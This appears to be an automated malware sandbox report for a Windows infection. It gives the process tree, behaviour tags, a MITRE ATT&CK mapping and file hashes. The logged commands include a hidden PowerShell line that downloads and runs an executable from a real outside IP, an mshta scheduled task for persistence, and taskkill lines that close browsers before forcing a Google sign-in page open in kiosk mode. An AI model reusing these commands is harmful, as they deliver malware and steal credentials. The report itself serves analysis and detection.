C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:28⤵PID:2664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:38⤵PID:2872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:88⤵PID:5824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:18⤵
- Uses browser remote debugging
PID:5764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:18⤵
- Uses browser remote debugging
PID:1372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:18⤵
- Uses browser remote debugging
PID:6520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:18⤵
- Uses browser remote debugging
PID:6528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:28⤵PID:6980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:28⤵PID:7152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2660 /prefetch:28⤵PID:6516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2416 /prefetch:28⤵PID:6772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2152 /prefetch:28⤵PID:6936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088437001\dd8dbe5ac0.exe"C:\Users\Admin\AppData\Local\Temp\1088437001\dd8dbe5ac0.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1072 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5940
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:5660
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6076 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1780 -prefMapHandle 1776 -prefsLen 27446 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c1a6faa-9504-4fc9-8a18-f98d9796e8fd} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" gpu9⤵PID:4744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28366 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d12bfa71-e830-4785-855f-a3e4eb45acae} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" socket9⤵PID:564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2816 -childID 1 -isForBrowser -prefsHandle 2740 -prefMapHandle 3232 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31644b6b-3ceb-4e1e-92fa-6cbc0b681a78} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab9⤵PID:5244
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 2 -isForBrowser -prefsHandle 3396 -prefMapHandle 3732 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7abd617d-a0f6-4aa8-a542-947e09992368} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab9⤵PID:5396
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4776 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4768 -prefMapHandle 4760 -prefsLen 32856 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b85c9d04-2811-4e91-8065-a275e9f816da} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" utility9⤵
- Checks processor information in registry
PID:1132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5220 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5276 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64f8ca16-0a64-4652-a591-c5597fd79f16} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab9⤵PID:1948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5400 -childID 4 -isForBrowser -prefsHandle 5488 -prefMapHandle 5484 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9766da65-e26e-4c03-8f42-279784d591d3} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab9⤵PID:4740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 5 -isForBrowser -prefsHandle 5684 -prefMapHandle 5680 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18a2669b-050e-47cd-b5bc-4b4f656b9176} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab9⤵PID:1816
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088438001\0f8ce684d7.exe"C:\Users\Admin\AppData\Local\Temp\1088438001\0f8ce684d7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:4588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn IP0NDmaQh2W /tr "mshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:5244 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn IP0NDmaQh2W /tr "mshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:5084
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4288 -
C:\Users\Admin\AppData\Local\TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE"C:\Users\Admin\AppData\Local\TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2664
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088439001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1088439001\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5404 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:5356 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"8⤵
- Executes dropped EXE
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6772
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3380 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"9⤵
- Executes dropped EXE
PID:5380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3380 -s 8289⤵
- Program crash
PID:5680
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6740 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"9⤵
- Executes dropped EXE
PID:6720
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 9769⤵
- Program crash
PID:6776
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"8⤵
- Executes dropped EXE
PID:7048
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1880 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6420
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 9609⤵
- Program crash
PID:6508
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5160 -
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"9⤵
- Executes dropped EXE
PID:6352
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"9⤵
- Executes dropped EXE
PID:1372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 8089⤵
- Program crash
PID:6816
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008990101\95c0f4af36.exe"C:\Users\Admin\AppData\Local\Temp\10008990101\95c0f4af36.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\10009000101\4c708b9de9.exe"C:\Users\Admin\AppData\Local\Temp\10009000101\4c708b9de9.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088440001\f613a12ef8.exe"C:\Users\Admin\AppData\Local\Temp\1088440001\f613a12ef8.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6828 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5148
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088441001\c6a31d1295.exe"C:\Users\Admin\AppData\Local\Temp\1088441001\c6a31d1295.exe"6⤵
- Executes dropped EXE
PID:6388
-
-
C:\Users\Admin\AppData\Local\Temp\1088442001\0519cf3c64.exe"C:\Users\Admin\AppData\Local\Temp\1088442001\0519cf3c64.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7104 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵PID:6868
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2276
-
C:\ProgramData\cqgurj\okhxpkh.exeC:\ProgramData\cqgurj\okhxpkh.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3360 -ip 33601⤵PID:4360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3952 -ip 39521⤵PID:1904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1948 -ip 19481⤵PID:3320
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5604 -ip 56041⤵PID:5712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6120
-
C:\ProgramData\wqbs\lpsbw.exeC:\ProgramData\wqbs\lpsbw.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5816
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4544
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3380 -ip 33801⤵PID:3784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6740 -ip 67401⤵PID:6764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1880 -ip 18801⤵PID:4580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5160 -ip 51601⤵PID:6284
-
C:\ProgramData\wqbs\lpsbw.exeC:\ProgramData\wqbs\lpsbw.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
PID:5680
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
PID:5944
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9KB
MD50358b88846c062130d9bfabdde97b4f7
SHA1e075398275a9ed7859885c5ead3ecf45ec437212
SHA2566d9ba480a8cba925ce303b81e12b0b729b694e445dd59dfd4ae78fb9344d64ab
SHA512bfdbd6e334c226f9937ad30772305df98931767c7b46b65ea8e5e8f3a6528de449a125440bb9947be63b967cfdfabaea36f66d5dc4cc3cbe88e7dc1690d6fa6f
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
1.2MB
MD533111cbf906e5247160ebff6df5800ed
SHA1c5faf84561a8badbd50e6b93c101ad78854c77b7
SHA2562566452848517efd6c6def977a69bd27b36c7c1bd6024ea140a88a3415c48b7b
SHA5125e751c938f6a7022a379fe04f770defe969cc0323a3e2921639d8f38c3f130f39be6c61efd596710d004c2133eabdf9ef5725e19ac97ca2053159f1d1217b1e6
-
Filesize
40B
MD5bd91c0f22d990f53b9f7cb0702985f50
SHA1276b3c7852a75182cbc21d8e8406832ec7ec72f4
SHA256f710a6f822b0eee3d2b75844dec5ad14a84f1a9560fd2dfe2293bd8af5df64ab
SHA512adcc09d91dec4e4115c1ca0b8bec0e8e718691c45e001747b84da1d4ef2e4f3cad2e97675606053b663c83c862eec4ec8c750ffbc8e77b8f646a832853a18e1e
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
284B
MD5d200dd1100a44a5a3b12e7d29db8b7b2
SHA17f05798377bc047665414fa546c6030329a6ec04
SHA2564f42727c37bb36f3000fc7f75b92b83373c9a0ae50877d823fec210a92ba366c
SHA51284c4d92cfa53a233e9df22d3e00e6b81c8f5acf5e680ece10d5620536982dc9fefbb8bd860cf85086e007f0a2674d5233222940b3bf04114ff474cb75e50eac7
-
Filesize
418B
MD5a48d6e0902306571ba718dd8a19241a4
SHA17fbd78565fc643ec8b4a4151eff2870f0268219e
SHA256253da8a8b990ca940b1d265b3a82f2ce3ea1a8b5aa43204894be16c7e5db85f0
SHA512c5a2c811ed113d4220d7e5f3423e5e70de737c13bb375349a5cb8753bef9a282474ccf689d656fd45e875b58fc9f3a2fc1ce7c34d433dc5f96cace835d6eb74c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5de63687-c391-4c74-bdd2-13288f489e20.dmp
Filesize825KB
MD5cd17ca4bbf77bee8e096ab646e873780
